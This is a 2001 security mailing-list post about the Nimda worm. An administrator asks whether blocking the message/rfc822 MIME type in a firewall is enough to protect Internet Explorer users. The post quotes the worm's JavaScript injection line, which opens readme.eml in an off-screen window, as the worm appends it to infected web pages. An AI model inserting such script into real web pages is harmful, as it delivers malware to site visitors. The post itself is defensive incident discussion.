Security Incidents mailing list archives
MIME type of readme.eml (was Re: New "concept" virus/worm?
From: Rob Quinn <rquinn () sec sprint net>
Date: Wed, 19 Sep 2001 01:25:20 -0400
- add this string to the web pages found on the server:
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
My Raptor firewall and WGET to one sample site show this as MIME type "message/rfc822". Does this seem to be universal? If I block just that type, will it be enough to stop nimda hitting IE users? ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New "concept" virus/worm? Joao Gouveia (Sep 18)
- Re: New "concept" virus/worm? Jay D. Dyson (Sep 18)
- Re: New "concept" virus/worm? Brett Glass (Sep 18)
- Re: New "concept" virus/worm? Berislav Kucan (Sep 18)
- Re: New "concept" virus/worm? Jim Olsen (Sep 18)
- Re: New "concept" virus/worm? Bernie Cosell (Sep 18)
- MIME type of readme.eml (was Re: New "concept" virus/worm? Rob Quinn (Sep 19)
- Re: MIME type of readme.eml (was Re: New "concept" virus/worm? Henrik Pedersen (Sep 19)
- Re: New "concept" virus/worm? Brett Glass (Sep 18)
- Re: New "concept" virus/worm? Jay D. Dyson (Sep 18)
- Re: New "concept" virus/worm? Ryan Russell (Sep 18)
- Re: New "concept" virus/worm? Nick FitzGerald (Sep 18)
- Re: New "concept" virus/worm? Jim (Sep 18)
- Side Affect of the new worm: HD fills up Stanley G. Bubrouski (Sep 19)
- Re: New "concept" virus/worm? Michael H. Warfield (Sep 18)
- RE: New "concept" virus/worm? Joseph P Frazee (Sep 18)